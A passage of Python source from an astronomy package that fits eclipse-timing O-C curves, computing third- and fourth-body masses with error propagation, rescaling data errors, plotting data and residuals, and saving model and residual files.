if 'a_sin_i3' in self.params_err: a_err=self.params_err['a_sin_i3']
else: a_err=0
if 'f_m3' in self.paramsMore_err: f3_err=self.paramsMore_err['f_m3']
else: f3_err=0
f_err=f*np.sqrt((f3_err/self.paramsMore['f_m3'])**2+9*(np.deg2rad(i_err)/np.tan(np.deg2rad(i)))**2)
#partial derivatives of M3 from the closed-form root of M3**3-f*M3**2-2*f*M*M3-f*M**2=0
D=4*f**3*M**3+27*f**2*M**4 #radicand (same as in "root" above)
R=2*f**3+18*f**2*M+27*f*M**2+3*np.sqrt(3)*np.sqrt(D) #root**3
dRM=18*f**2+54*f*M+3*np.sqrt(3)*(12*f**3*M**2+108*f**2*M**3)/(2*np.sqrt(D)) #dR/dM
dRf=6*f**2+36*f*M+27*M**2+3*np.sqrt(3)*(12*f**2*M**3+54*f*M**4)/(2*np.sqrt(D)) #dR/df
#dM3/dM
dM=dRM/(9*2**(1./3.)*R**(2./3.))+2*2**(1./3.)*f/R**(1./3.)-2**(1./3.)*(f**2+6*f*M)*dRM/(9*R**(4./3.))
#dM3/df
df=1/3.+dRf/(9*2**(1./3.)*R**(2./3.))+2**(1./3.)*(2*f+6*M)/(3*R**(1./3.))-2**(1./3.)*(f**2+6*f*M)*dRf/(9*R**(4./3.))
#calculate errors of params
self.paramsMore_err['a12']=self.paramsMore['a12']*np.sqrt((a_err/self.params['a_sin_i3'])**2+(np.deg2rad(i_err)/np.tan(np.deg2rad(i)))**2)
self.paramsMore_err['M3']=np.sqrt((dM*M_err)**2+(df*f_err)**2)
self.paramsMore_err['a3']=self.paramsMore['a3']*np.sqrt((self.paramsMore_err['a12']/self.paramsMore['a12'])**2+\
(M_err/M)**2+(self.paramsMore_err['M3']/self.paramsMore['M3'])**2)
self.paramsMore_err['a']=self.paramsMore_err['a12']+self.paramsMore_err['a3']
#if some errors = 0, del them; and return only non-zero errors
if self.paramsMore_err['M3']==0: del self.paramsMore_err['M3']
else: output['M3_err']=self.paramsMore_err['M3']
if self.paramsMore_err['a12']==0: del self.paramsMore_err['a12']
else: output['a12_err']=self.paramsMore_err['a12']
if self.paramsMore_err['a3']==0: del self.paramsMore_err['a3']
else: output['a3_err']=self.paramsMore_err['a3']
if self.paramsMore_err['a']==0: del self.paramsMore_err['a']
else: output['a_err']=self.paramsMore_err['a']
if 'LiTE34' in self.model:
#LiTE34 and LiTE34Quad models
self.paramsMore['a12-3']=self.paramsMore['a']
output['a12-3']=self.paramsMore['a']
if 'a' in self.paramsMore_err:
self.paramsMore_err['a12-3']=self.paramsMore_err['a']
output['a12-3_err']=self.paramsMore_err['a12-3']
self.paramsMore['a123']=self.params['a_sin_i4']/np.sin(np.deg2rad(i))
f=self.paramsMore['f_m4']/np.sin(np.deg2rad(i))**3 #Mass function of 4th body/sin(i)**3
root=(2*f**3+18*f**2*M+3*np.sqrt(3)*np.sqrt(4*f**3*M**3+27*f**2*M**4)+27*f*M**2)**(1./3.)
self.paramsMore['M4']=root/(3*2**(1./3.))-2**(1./3.)*(-f**2-6*f*M)/(3*root)+f/3.
self.paramsMore['a4']=self.paramsMore['a123']*M/self.paramsMore['M4']
self.paramsMore['a']=self.paramsMore['a123']+self.paramsMore['a4']
output['M4']=self.paramsMore['M4']
output['a123']=self.paramsMore['a123']
output['a4']=self.paramsMore['a4']
output['a']=self.paramsMore['a']
if len(self.params_err)>0:
#calculate error of params
#get errors of params of 4th body
if 'a_sin_i4' in self.params_err: a_err=self.params_err['a_sin_i4']
else: a_err=0
if 'f_m4' in self.paramsMore_err: f4_err=self.paramsMore_err['f_m4']
else: f4_err=0
f_err=f*np.sqrt((f4_err/self.paramsMore['f_m4'])**2+9*(np.deg2rad(i_err)/np.tan(np.deg2rad(i)))**2)
#partial derivatives of M4 (same closed-form root as for M3)
D=4*f**3*M**3+27*f**2*M**4 #radicand (same as in "root" above)
R=2*f**3+18*f**2*M+27*f*M**2+3*np.sqrt(3)*np.sqrt(D) #root**3
dRM=18*f**2+54*f*M+3*np.sqrt(3)*(12*f**3*M**2+108*f**2*M**3)/(2*np.sqrt(D)) #dR/dM
dRf=6*f**2+36*f*M+27*M**2+3*np.sqrt(3)*(12*f**2*M**3+54*f*M**4)/(2*np.sqrt(D)) #dR/df
#dM4/dM
dM=dRM/(9*2**(1./3.)*R**(2./3.))+2*2**(1./3.)*f/R**(1./3.)-2**(1./3.)*(f**2+6*f*M)*dRM/(9*R**(4./3.))
#dM4/df
df=1/3.+dRf/(9*2**(1./3.)*R**(2./3.))+2**(1./3.)*(2*f+6*M)/(3*R**(1./3.))-2**(1./3.)*(f**2+6*f*M)*dRf/(9*R**(4./3.))
#calculate errors of params
self.paramsMore_err['a123']=self.paramsMore['a123']*np.sqrt((a_err/self.params['a_sin_i4'])**2+(np.deg2rad(i_err)/np.tan(np.deg2rad(i)))**2)
self.paramsMore_err['M4']=np.sqrt((dM*M_err)**2+(df*f_err)**2)
self.paramsMore_err['a4']=self.paramsMore['a4']*np.sqrt((self.paramsMore_err['a123']/self.paramsMore['a123'])**2+\
(M_err/M)**2+(self.paramsMore_err['M4']/self.paramsMore['M4'])**2)
self.paramsMore_err['a']=self.paramsMore_err['a123']+self.paramsMore_err['a4']
#if some errors = 0, del them; and return only non-zero errors
if self.paramsMore_err['M4']==0: del self.paramsMore_err['M4']
else: output['M4_err']=self.paramsMore_err['M4']
if self.paramsMore_err['a123']==0: del self.paramsMore_err['a123']
else: output['a123_err']=self.paramsMore_err['a123']
if self.paramsMore_err['a4']==0: del self.paramsMore_err['a4']
else: output['a4_err']=self.paramsMore_err['a4']
if self.paramsMore_err['a']==0: del self.paramsMore_err['a']
else: output['a_err']=self.paramsMore_err['a']
if 'Agol' in self.model:
#AgolInPlanet, AgolInPlanetLin, AgolExPlanet, AgolExPlanetLin
self.paramsMore['M3']=M*self.params['mu3']/(1-self.params['mu3'])
self.paramsMore['a']=((self.params['P3']/365.2425)**2*(M+self.paramsMore['M3']))**(1./3.)
output['M3']=self.paramsMore['M3']
output['a']=self.paramsMore['a']
if len(self.params_err)>0:
#calculate error of params
#get errors of params of 3rd body
if 'mu3' in self.params_err: mu3_err=self.params_err['mu3']
else: mu3_err=0
if 'P3' in self.params_err: P3_err=self.params_err['P3']
else: P3_err=0
#calculate error of params
self.paramsMore_err['M3']=self.paramsMore['M3']*np.sqrt((M_err/M)**2+\
(mu3_err/(self.params['mu3']*(1-self.params['mu3'])))**2)
self.paramsMore_err['a']=self.paramsMore['a']/3.*np.sqrt(((M_err+self.paramsMore_err['M3'])/\
(M+self.paramsMore['M3']))**2+(2*P3_err/self.params['P3'])**2)
#if some errors = 0, del them; and return only non-zero errors
if self.paramsMore_err['M3']==0: del self.paramsMore_err['M3']
else: output['M3_err']=self.paramsMore_err['M3']
if self.paramsMore_err['a']==0: del self.paramsMore_err['a']
else: output['a_err']=self.paramsMore_err['a']
return output
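AbsoluteParam() inverts f = M3³/(M+M3)² (the mass function divided by sin³i) with a closed-form Cardano root of the cubic M3³ − f·M3² − 2fM·M3 − fM² = 0. The root can be sanity-checked by substituting it back into the cubic; a sketch with illustrative values:

```python
import numpy as np

def m3_closed_form(f, M):
    """Cardano root of M3**3 - f*M3**2 - 2*f*M*M3 - f*M**2 = 0 (same form as in the code above)."""
    root = (2*f**3 + 18*f**2*M + 3*np.sqrt(3)*np.sqrt(4*f**3*M**3 + 27*f**2*M**4)
            + 27*f*M**2)**(1/3.)
    return root/(3*2**(1/3.)) + 2**(1/3.)*(f**2 + 6*f*M)/(3*root) + f/3.

f, M = 0.05, 2.0            # mass function / sin(i)**3 and binary mass, in M_sun
M3 = m3_closed_form(f, M)
residual = M3**3 - f*M3**2 - 2*f*M*M3 - f*M**2   # should vanish for the true root
```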
def Model(self,t=None,param=None,min_type=None):
'''calculate the model O-C curve at given times for a given set of parameters'''
if t is None: t=self.t
if param is None: param=self.params
if self.model=='LiTE3':
model=self.LiTE3(t,param['a_sin_i3'],param['e3'],param['w3'],param['t03'],param['P3'])
elif self.model=='LiTE34':
model=self.LiTE34(t,param['a_sin_i3'],param['e3'],param['w3'],param['t03'],param['P3'],
param['a_sin_i4'],param['e4'],param['w4'],param['t04'],param['P4'])
elif self.model=='LiTE3Quad':
model=self.LiTE3Quad(t,param['t0'],param['P'],param['Q'],param['a_sin_i3'],param['e3'],
param['w3'],param['t03'],param['P3'])
elif self.model=='LiTE34Quad':
model=self.LiTE34Quad(t,param['t0'],param['P'],param['Q'],
param['a_sin_i3'],param['e3'],param['w3'],param['t03'],param['P3'],
param['a_sin_i4'],param['e4'],param['w4'],param['t04'],param['P4'])
elif self.model=='AgolInPlanet':
model=self.AgolInPlanet(t,param['P'],param['a'],param['w'],param['e'],
param['mu3'],param['r3'],param['w3'],param['t03'],param['P3'])
elif self.model=='AgolInPlanetLin':
model=self.AgolInPlanetLin(t,param['t0'],param['P'],param['a'],param['w'],param['e'],
param['mu3'],param['r3'],param['w3'],param['t03'],param['P3'])
elif self.model=='AgolExPlanet':
model=self.AgolExPlanet(t,param['P'],param['mu3'],param['e3'],param['t03'],param['P3'])
elif self.model=='AgolExPlanetLin':
model=self.AgolExPlanetLin(t,param['t0'],param['P'],param['mu3'],param['e3'],param['t03'],param['P3'])
elif self.model=='Apsidal':
if min_type is None: min_type=self._min_type
model=self.Apsidal(t,param['t0'],param['P'],param['w0'],param['dw'],param['e'],min_type)
else:
raise ValueError('The model "'+self.model+'" does not exist!')
return model
def CalcErr(self):
'''estimate errors of input data based on current model (useful before using FitMCMC)'''
model=self.Model(self.t,self.params) #calculate model values
n=len(model) #number of data points
err=np.sqrt(sum((self.oc-model)**2)/(n-1)) #calculate corrected sample standard deviation
err*=np.ones(model.shape) #generate array of errors
chi=sum(((self.oc-model)/err)**2) #calculate new chi2 error -> chi2_r = 1
print('New chi2:',chi,chi/(n-len(self.fit_params)))
self._calc_err=True
self._set_err=False
self.err=err
return err
def CorrectErr(self):
'''correct the scale of the given errors of input data based on the current model
(useful if FitMCMC gives worse results than FitGA and chi2_r is not approx. 1)'''
model=self.Model(self.t,self.params) #calculate model values
n=len(model) #number of data points
chi0=sum(((self.oc-model)/self.err)**2) #original chi2 error
alfa=chi0/(n-len(self.fit_params)) #coefficient between old and new errors -> chi2_r = 1
err=self.err*np.sqrt(alfa) #new errors
chi=sum(((self.oc-model)/err)**2) #calculate new chi2 error
print('New chi2:',chi,chi/(n-len(self.fit_params)))
if self._set_err and len(self._old_err)==0: self._old_err=self.err #if errors were given, save old values
self.err=err
self._corr_err=True
return err
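CorrectErr() rescales the supplied errors by sqrt(chi²/(n−g)) so that the reduced chi² of the current model becomes exactly 1. A standalone sketch of that rescaling on synthetic residuals (function name and numbers are illustrative):

```python
import numpy as np

def rescale_errors(resid, err, g):
    """Scale errors so that chi2_r = chi2/(n-g) equals 1 for the given residuals."""
    n = len(resid)
    chi0 = np.sum((resid / err)**2)        # chi2 with the original errors
    return err * np.sqrt(chi0 / (n - g))   # new errors

resid = np.array([0.3, -0.2, 0.4, -0.1, 0.25])
err = np.full(5, 0.1)                      # deliberately underestimated errors
new_err = rescale_errors(resid, err, g=1)
chi2_r = np.sum((resid / new_err)**2) / (len(resid) - 1)
```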
def AddWeight(self,weight):
'''add weights to input data and scale them according to the current model
warning: weights have to be in the same order as the input data!'''
if not len(weight)==len(self.t):
#wrong length of given weight array
print('Incorrect length of "weight"!')
return
weight=np.array(weight)
err=1./weight[self._order] #transform to errors and change order according to order of input data
n=len(self.t) #number of data points
model=self.Model(self.t,self.params) #calculate model values
chi0=sum(((self.oc-model)/err)**2) #original chi2 error
alfa=chi0/(n-len(self.fit_params)) #coefficient between old and new errors -> chi2_r = 1
err*=np.sqrt(alfa) #new errors
chi=sum(((self.oc-model)/err)**2) #calculate new chi2 error
print('New chi2:',chi,chi/(n-len(self.fit_params)))
self._calc_err=True
self._set_err=False
self.err=err
return err
def Plot(self,name=None,no_plot=0,no_plot_err=0,params=None,eps=False,oc_min=True,
time_type='JD',offset=2400000,trans=True,title=None,epoch=False,
min_type=False,weight=None,trans_weight=False,model2=False,with_res=False,
bw=False,double_ax=False,legend=None,fig_size=None):
'''plot the original O-C together with the model O-C based on the current parameter set
name - name of the output file (if not given -> show the graph)
no_plot - number of outlier points which will not be plotted
no_plot_err - number of points with the largest errors which will not be plotted
params - set of params of the current model (if not given -> current parameter set)
eps - save also as an eps file
oc_min - O-C in minutes (if False - days)
time_type - type of JD in which the time is given (shown in the x label)
offset - offset of time
trans - transform time according to the offset
title - title of the graph
epoch - x axis in epochs
min_type - distinguish the type of minimum
weight - weights of data (shown as point sizes)
trans_weight - transform weights to the range (1,10)
model2 - plot 2 model O-Cs - the current parameter set and the set given in "params"
with_res - common plot with residuals
bw - black&white plot
double_ax - two axes -> time and epoch
legend - labels for data and model(s) - use '' to hide a label; the 2nd model given in "params" is the last
fig_size - custom figure size - e.g. (12,6)
warning: weights have to be in the same order as the input data!
'''
if epoch:
if not len(self.epoch)==len(self.t):
raise NameError('Epoch not calculated! Run the function "Epoch" first.')
if model2:
if params is None:
raise ValueError('Parameters set for 2nd model not given!')
params_model=dict(params)
params=self.params
if params is None: params=self.params
if legend is None:
legend=['','','']
show_legend=False
else: show_legend=True
if fig_size:
fig=mpl.figure(figsize=fig_size)
else:
fig=mpl.figure()
#2 plots - for residue
if with_res:
gs=gridspec.GridSpec(2,1,height_ratios=[4,1])
ax1=fig.add_subplot(gs[0])
ax2=fig.add_subplot(gs[1],sharex=ax1)
else:
ax1=fig.add_subplot(1,1,1)
ax2=ax1
ax1.yaxis.set_label_coords(-0.11,0.5)
#setting labels
if epoch and not double_ax:
ax2.set_xlabel('Epoch')
x=self.epoch
elif offset>0:
ax2.set_xlabel('Time ('+time_type+' - '+str(offset)+')')
if not trans: offset=0
x=self.t-offset
else:
ax2.set_xlabel('Time ('+time_type+')')
offset=0
x=self.t
if oc_min:
ax1.set_ylabel('O - C (min)')
k=minutes
else:
ax1.set_ylabel('O - C (d)')
k=1
if title is not None:
if double_ax: fig.subplots_adjust(top=0.85)
fig.suptitle(title,fontsize=20)
model=self.Model(self.t,params)
self.res=self.oc-model
#primary / secondary minimum
if min_type:
if not len(self.epoch)==len(self.t):
raise NameError('Epoch not calculated! Run the function "Epoch" first.')
prim=np.where(self._min_type==0)
sec=np.where(self._min_type==1)
else:
prim=np.arange(0,len(self.t),1)
sec=np.array([])
#set weight
set_w=False
if weight is not None:
weight=np.array(weight)[self._order]
if trans_weight:
w_min=min(weight)
w_max=max(weight)
weight=9./(w_max-w_min)*(weight-w_min)+1
if weight.shape==self.t.shape:
w=[]
levels=[0,3,5,7.9,10]
size=[3,4,5,7]
for i in range(len(levels)-1):
w.append(np.where((weight>levels[i])*(weight<=levels[i+1])))
w[-1]=np.append(w[-1],np.where(weight>levels[-1])) #if some weight is bigger than max. level
set_w=True
else:
warnings.warn('Shape of "weight" differs from shape of "time". Weights will be ignored!')
errors=GetMax(abs(model-self.oc),no_plot) #remove outlier points
if bw: color='k'
else: color='b'
if set_w:
#using weights
prim=np.delete(prim,np.where(np.in1d(prim,errors)))
sec=np.delete(sec,np.where(np.in1d(sec,errors)))
if not len(prim)==0:
for i in range(len(w)):
ax1.plot(x[prim[np.where(np.in1d(prim,w[i]))]],
(self.oc*k)[prim[np.where(np.in1d(prim,w[i]))]],color+'o',markersize=size[i],label=legend[0],zorder=1)
if not len(sec)==0:
for i in range(len(w)):
ax1.plot(x[sec[np.where(np.in1d(sec,w[i]))]],
(self.oc*k)[sec[np.where(np.in1d(sec,w[i]))]],color+'o',markersize=size[i],
fillstyle='none',markeredgewidth=1,markeredgecolor=color,label=legend[0],zorder=1)
else:
#without weight
if self._set_err:
#using errors
if self._corr_err: err=self._old_err
else: err=self.err
errors=np.append(errors,GetMax(err,no_plot_err)) #remove errorful points
prim=np.delete(prim,np.where(np.in1d(prim,errors)))
sec=np.delete(sec,np.where(np.in1d(sec,errors)))
if not len(prim)==0:
ax1.errorbar(x[prim],(self.oc*k)[prim],yerr=(err*k)[prim],fmt=color+'o',markersize=5,label=legend[0],zorder=1)
if not len(sec)==0:
ax1.errorbar(x[sec],(self.oc*k)[sec],yerr=(err*k)[sec],fmt=color+'o',markersize=5,
fillstyle='none',markeredgewidth=1,markeredgecolor=color,label=legend[0],zorder=1)
else:
#without errors
prim=np.delete(prim,np.where(np.in1d(prim,errors)))
sec=np.delete(sec,np.where(np.in1d(sec,errors)))
if not len(prim)==0:
ax1.plot(x[prim],(self.oc*k)[prim],color+'o',label=legend[0],zorder=1)
if not len(sec)==0:
ax1.plot(x[sec],(self.oc*k)[sec],color+'o',label=legend[0],
mfc='none',markeredgewidth=1,markeredgecolor=color,zorder=1)
#expand time interval for model O-C
if len(self.t)<1000:
if 't0' in params:
old_epoch=self.epoch
dE=(self.epoch[-1]-self.epoch[0])/1000.
E=np.linspace(self.epoch[0]-50*dE,self.epoch[-1]+50*dE,1100)
t1=params['t0']+params['P']*E
self.epoch=E
elif epoch:
dE=(self.epoch[-1]-self.epoch[0])/1000.
E=np.linspace(self.epoch[0]-50*dE,self.epoch[-1]+50*dE,1100)
t1=self._t0P[0]+self._t0P[1]*E
else:
dt=(self.t[-1]-self.t[0])/1000.
t1=np.linspace(self.t[0]-50*dt,self.t[-1]+50*dt,1100)
else:
if 't0' in params:
old_epoch=self.epoch
dE=(self.epoch[-1]-self.epoch[0])/len(self.epoch)
E=np.linspace(self.epoch[0]-0.05*len(self.epoch)*dE,self.epoch[-1]+0.05*len(self.epoch)*dE,int(1.1*len(self.epoch)))
t1=params['t0']+params['P']*E
self.epoch=E
elif epoch:
dE=(self.epoch[-1]-self.epoch[0])/len(self.epoch)
E=np.linspace(self.epoch[0]-0.05*len(self.epoch)*dE,self.epoch[-1]+0.05*len(self.epoch)*dE,int(1.1*len(self.epoch)))
t1=self._t0P[0]+self._t0P[1]*E
else:
dt=(self.t[-1]-self.t[0])/len(self.t)
t1=np.linspace(self.t[0]-0.05*len(self.t)*dt,self.t[-1]+0.05*len(self.t)*dt,int(1.1*len(self.t)))
if bw:
color='k'
lw=2
else:
color='r'
lw=1
if self.model=='Apsidal':
#primary
model_long=self.Model(t1,params,min_type=np.zeros(t1.shape))
if epoch and not double_ax: ax1.plot(E,model_long*k,color,linewidth=lw,label=legend[1],zorder=2)
else: ax1.plot(t1-offset,model_long*k,color,linewidth=lw,label=legend[1],zorder=2)
#secondary
model_long=self.Model(t1,params,min_type=np.ones(t1.shape))
if epoch and not double_ax: ax1.plot(E,model_long*k,color,linewidth=lw,label=legend[1],zorder=2)
else: ax1.plot(t1-offset,model_long*k,color,linewidth=lw,label=legend[1],zorder=2)
else:
model_long=self.Model(t1,params)
if epoch and not double_ax: ax1.plot(E,model_long*k,color,linewidth=lw,label=legend[1],zorder=2)
else: ax1.plot(t1-offset,model_long*k,color,linewidth=lw,label=legend[1],zorder=2)
if model2:
#plot second model
if bw:
color='k'
lt='--'
else:
color='g'
lt='-'
model_set=self.Model(t1,params_model)
if epoch and not double_ax: ax1.plot(E,model_set*k,color+lt,linewidth=lw,label=legend[2],zorder=3)
else: ax1.plot(t1-offset,model_set*k,color+lt,linewidth=lw,label=legend[2],zorder=3)
if show_legend: ax1.legend()
if 't0' in params: self.epoch=old_epoch
if double_ax:
#setting second axis
if not len(self.epoch)==len(self.t):
raise NameError('Epoch not calculated! Run the function "Epoch" first.')
ax3=ax1.twiny()
#generate plot to obtain correct axis in epoch
#expand time interval for model O-C
if len(self.t)<1000:
dE=(self.epoch[-1]-self.epoch[0])/1000.
E=np.linspace(self.epoch[0]-50*dE,self.epoch[-1]+50*dE,1100)
else:
dE=(self.epoch[-1]-self.epoch[0])/len(self.epoch)
E=np.linspace(self.epoch[0]-0.05*len(self.epoch)*dE,self.epoch[-1]+0.05*len(self.epoch)*dE,int(1.1*len(self.epoch)))
l=ax3.plot(E,model_long*k)
ax3.set_xlabel('Epoch')
l.pop(0).remove()
lims=np.array(ax1.get_xlim())
epoch=np.round((lims-self._t0P[0])/self._t0P[1]*2)/2.
ax3.set_xlim(epoch)
if with_res:
#plot residue
if bw: color='k'
else: color='b'
if oc_min: ax2.set_ylabel('Residue (min)')
else: ax2.set_ylabel('Residue (d)')
ax2.yaxis.set_label_coords(-0.1,0.5)
m=round(abs(max(-min(self.res),max(self.res)))*k,2)
ax2.set_autoscale_on(False)
ax2.set_ylim([-m,m])
ax2.yaxis.set_ticks(np.array([-m,0,m]))
ax2.plot(x,self.res*k,color+'o')
ax2.xaxis.labelpad=15
ax2.yaxis.labelpad=15
mpl.subplots_adjust(hspace=.07)
mpl.setp(ax1.get_xticklabels(),visible=False)
if name is None: mpl.show()
else:
mpl.savefig(name+'.png')
if eps: mpl.savefig(name+'.eps')
mpl.close(fig)
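Plot() (and PlotRes() below) map data weights to marker sizes: weights are optionally rescaled to (1,10) and then binned into four size groups, with anything above the top level joining the largest group. A standalone sketch of that binning (helper name illustrative; rescaling applied as with trans_weight=True):

```python
import numpy as np

def weight_bins(weight):
    """Rescale weights to (1,10) and bin them into the four marker-size groups used for plotting."""
    weight = np.asarray(weight, dtype=float)
    weight = 9. / (weight.max() - weight.min()) * (weight - weight.min()) + 1
    levels = [0, 3, 5, 7.9, 10]
    size = [3, 4, 5, 7]   # marker sizes, one per bin
    groups = [np.where((weight > levels[i]) & (weight <= levels[i + 1]))[0]
              for i in range(len(levels) - 1)]
    # anything above the top level joins the largest-size group
    groups[-1] = np.append(groups[-1], np.where(weight > levels[-1])[0])
    return groups, size

groups, size = weight_bins([1, 2, 3, 4, 5])   # rescaled to [1, 3.25, 5.5, 7.75, 10]
```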
def PlotRes(self,name=None,no_plot=0,no_plot_err=0,params=None,eps=False,oc_min=True,
time_type='JD',offset=2400000,trans=True,title=None,epoch=False,
min_type=False,weight=None,trans_weight=False,bw=False,double_ax=False,
fig_size=None):
'''plot residuals (new O-C)
name - name of the output file (if not given -> show the graph)
no_plot - number of outlier points which will not be plotted
no_plot_err - number of points with the largest errors which will not be plotted
params - set of params of the current model (if not given -> current parameter set)
eps - save also as an eps file
oc_min - O-C in minutes (if False - days)
time_type - type of JD in which the time is given (shown in the x label)
offset - offset of time
trans - transform time according to the offset
title - title of the graph
epoch - x axis in epochs
min_type - distinguish the type of minimum
weight - weights of data (shown as point sizes)
trans_weight - transform weights to the range (1,10)
bw - black&white plot
double_ax - two axes -> time and epoch
fig_size - custom figure size - e.g. (12,6)
warning: weights have to be in the same order as the input data!
'''
if epoch:
if not len(self.epoch)==len(self.t):
raise NameError('Epoch not calculated! Run the function "Epoch" first.')
if params is None: params=self.params
if fig_size:
fig=mpl.figure(figsize=fig_size)
else:
fig=mpl.figure()
ax1=fig.add_subplot(1,1,1)
ax1.yaxis.set_label_coords(-0.11,0.5)
#setting labels
if epoch and not double_ax:
ax1.set_xlabel('Epoch')
x=self.epoch
elif offset>0:
ax1.set_xlabel('Time ('+time_type+' - '+str(offset)+')')
if not trans: offset=0
x=self.t-offset
else:
ax1.set_xlabel('Time ('+time_type+')')
offset=0
x=self.t
if oc_min:
ax1.set_ylabel('Residue O - C (min)')
k=minutes
else:
ax1.set_ylabel('Residue O - C (d)')
k=1
if title is not None:
if double_ax: fig.subplots_adjust(top=0.85)
fig.suptitle(title,fontsize=20)
model=self.Model(self.t,params)
self.res=self.oc-model
#primary / secondary minimum
if min_type:
if not len(self.epoch)==len(self.t):
raise NameError('Epoch not calculated! Run the function "Epoch" first.')
prim=np.where(self._min_type==0)
sec=np.where(self._min_type==1)
else:
prim=np.arange(0,len(self.t),1)
sec=np.array([])
#set weight
set_w=False
if weight is not None:
weight=np.array(weight)[self._order]
if trans_weight:
w_min=min(weight)
w_max=max(weight)
weight=9./(w_max-w_min)*(weight-w_min)+1
if weight.shape==self.t.shape:
w=[]
levels=[0,3,5,7.9,10]
size=[3,4,5,7]
for i in range(len(levels)-1):
w.append(np.where((weight>levels[i])*(weight<=levels[i+1])))
w[-1]=np.append(w[-1],np.where(weight>levels[-1])) #if some weight is bigger than max. level
set_w=True
else:
                warnings.warn('Shape of "weight" is different from shape of "time". Weights will be ignored!')
errors=GetMax(abs(self.res),no_plot) #remove outlier points
if bw: color='k'
else: color='b'
if set_w:
#using weights
prim=np.delete(prim,np.where(np.in1d(prim,errors)))
sec=np.delete(sec,np.where(np.in1d(sec,errors)))
if not len(prim)==0:
for i in range(len(w)):
mpl.plot(x[prim[np.where(np.in1d(prim,w[i]))]],
(self.res*k)[prim[np.where(np.in1d(prim,w[i]))]],color+'o',markersize=size[i])
if not len(sec)==0:
for i in range(len(w)):
mpl.plot(x[sec[np.where(np.in1d(sec,w[i]))]],
(self.res*k)[sec[np.where(np.in1d(sec,w[i]))]],color+'o',markersize=size[i],
fillstyle='none',markeredgewidth=1,markeredgecolor=color)
else:
#without weight
if self._set_err:
#using errors
if self._corr_err: err=self._old_err
else: err=self.err
errors=np.append(errors,GetMax(err,no_plot_err)) #remove errorful points
prim=np.delete(prim,np.where(np.in1d(prim,errors)))
sec=np.delete(sec,np.where(np.in1d(sec,errors)))
if not len(prim)==0:
mpl.errorbar(x[prim],(self.res*k)[prim],yerr=(err*k)[prim],fmt=color+'o',markersize=5)
if not len(sec)==0:
mpl.errorbar(x[sec],(self.res*k)[sec],yerr=(err*k)[sec],fmt=color+'o',markersize=5,
fillstyle='none',markeredgewidth=1,markeredgecolor=color)
else:
#without errors
prim=np.delete(prim,np.where(np.in1d(prim,errors)))
sec=np.delete(sec,np.where(np.in1d(sec,errors)))
if not len(prim)==0:
mpl.plot(x[prim],(self.res*k)[prim],color+'o')
if not len(sec)==0:
mpl.plot(x[sec],(self.res*k)[sec],color+'o',
mfc='none',markeredgewidth=1,markeredgecolor=color)
if double_ax:
            #setting second axis
if not len(self.epoch)==len(self.t):
                raise NameError('Epoch not calculated! Run function "Epoch" before it.')
ax2=ax1.twiny()
#generate plot to obtain correct axis in epoch
l=ax2.plot(self.epoch,self.res*k)
ax2.set_xlabel('Epoch')
l.pop(0).remove()
lims=np.array(ax1.get_xlim())
epoch=np.round((lims-self._t0P[0])/self._t0P[1]*2)/2.
ax2.set_xlim(epoch)
if name is None: mpl.show()
else:
mpl.savefig(name+'.png')
if eps: mpl.savefig(name+'.eps')
mpl.close(fig)
def SaveModel(self,name,E_min=None,E_max=None,n=1000,params=None,t0=None,P=None):
'''save model curve of O-C to file
name - name of output file
E_min - minimal value of epoch
E_max - maximal value of epoch
n - number of data points
params - parameters of model (if not given, used "params" from class)
        t0 - time of zero epoch (necessary if not given in model or epoch not calculated)
        P - period (necessary if not given in model or epoch not calculated)
'''
if params is None: params=self.params
#get linear ephemeris
if 't0' in params: t0=params['t0']
elif len(self.epoch)==len(self.t): t0=self._t0P[0]
elif t0 is None: raise TypeError('t0 is not given!')
if 'P' in params: P=params['P']
elif len(self.epoch)==len(self.t): P=self._t0P[1]
elif P is None: raise TypeError('P is not given!')
old_epoch=self.epoch
if not len(self.epoch)==len(self.t): self.Epoch(t0,P)
#same interval of epoch like in plot
if len(self.epoch)<1000: dE=50*(self.epoch[-1]-self.epoch[0])/1000.
else: dE=0.05*(self.epoch[-1]-self.epoch[0])
if E_min is None: E_min=min(self.epoch)-dE
if E_max is None: E_max=max(self.epoch)+dE
self.epoch=np.linspace(E_min,E_max,n)
t=t0+P*self.epoch
if self.model=='Apsidal':
typeA=np.append(np.zeros(t.shape),np.ones(t.shape))
t=np.append(t,t)
self.epoch=np.append(self.epoch,self.epoch)
i=np.argsort(np.append(np.arange(0,len(t),2),np.arange(1,len(t),2)))
t=t[i]
typeA=typeA[i]
self.epoch=self.epoch[i]
model=self.Model(t,params,min_type=typeA)
f=open(name,'w')
np.savetxt(f,np.column_stack((t+model,self.epoch,model,typeA)), fmt=["%14.7f",'%10.3f',"%+12.10f","%1d"]
,delimiter=' ',header='Obs. Time'.ljust(14,' ')+' '+'Epoch'.ljust(10,' ')+' model O-C'.ljust(13,' ')+' type')
f.close()
else:
model=self.Model(t,params)
f=open(name,'w')
np.savetxt(f,np.column_stack((t+model,self.epoch,model)),fmt=["%14.7f",'%10.3f',"%+12.10f"]
,delimiter=' ',header='Obs. Time'.ljust(14,' ')+' '+'Epoch'.ljust(10,' ')
+' model O-C')
f.close()
self.epoch=old_epoch
def SaveRes(self,name,params=None,t0=None,P=None,weight=None):
'''save residue to file
name - name of output file
params - parameters of model (if not given, used "params" from class)
        t0 - time of zero epoch (necessary if not given in model or epoch not calculated)
        P - period (necessary if not given in model or epoch not calculated)
        weight - weights of input data points
        warning: weights have to be in the same order as the input data!
'''
if params is None: params=self.params
#get linear ephemeris
if 't0' in params: t0=params['t0']
elif len(self.epoch)==len(self.t): t0=self._t0P[0]
elif t0 is None: raise TypeError('t0 is not given!')
if 'P' in params: P=params['P']
elif len(self.epoch)==len(self.t): P=self._t0P[1]
elif P is None: raise TypeError('P is not given!')
old_epoch=self.epoch
        if not len(self.epoch)==len(self.t): self.Epoch(t0,P)
model=self.Model(self.t,params)
self.res=self.oc-model
f=open(name,'w')
if self._set_err:
if self._corr_err: err=self._old_err
else: err=self.err
np.savetxt(f,np.column_stack((self.t,self.epoch,self.res,err)),
fmt=["%14.7f",'%10.3f',"%+12.10f","%.10f"],delimiter=" ",
header='Obs. Time'.ljust(14,' ')+' '+'Epoch'.ljust(10,' ')
+' '+'new O-C'.ljust(10,' ')+' Error')
elif weight is not None:
np.savetxt(f,np.column_stack((self.t,self.epoch,self.res,np.array(weight)[self._order])),
fmt=["%14.7f",'%10.3f',"%+12.10f","%.10f"],delimiter=" ",
header='Obs. Time'.ljust(14,' ')+' '+'Epoch'.ljust(10,' ')
+' '+'new O-C'.ljust(12,' ')+' Weight')
else:
np.savetxt(f,np.column_stack((self.t,self.epoch,self.res)),
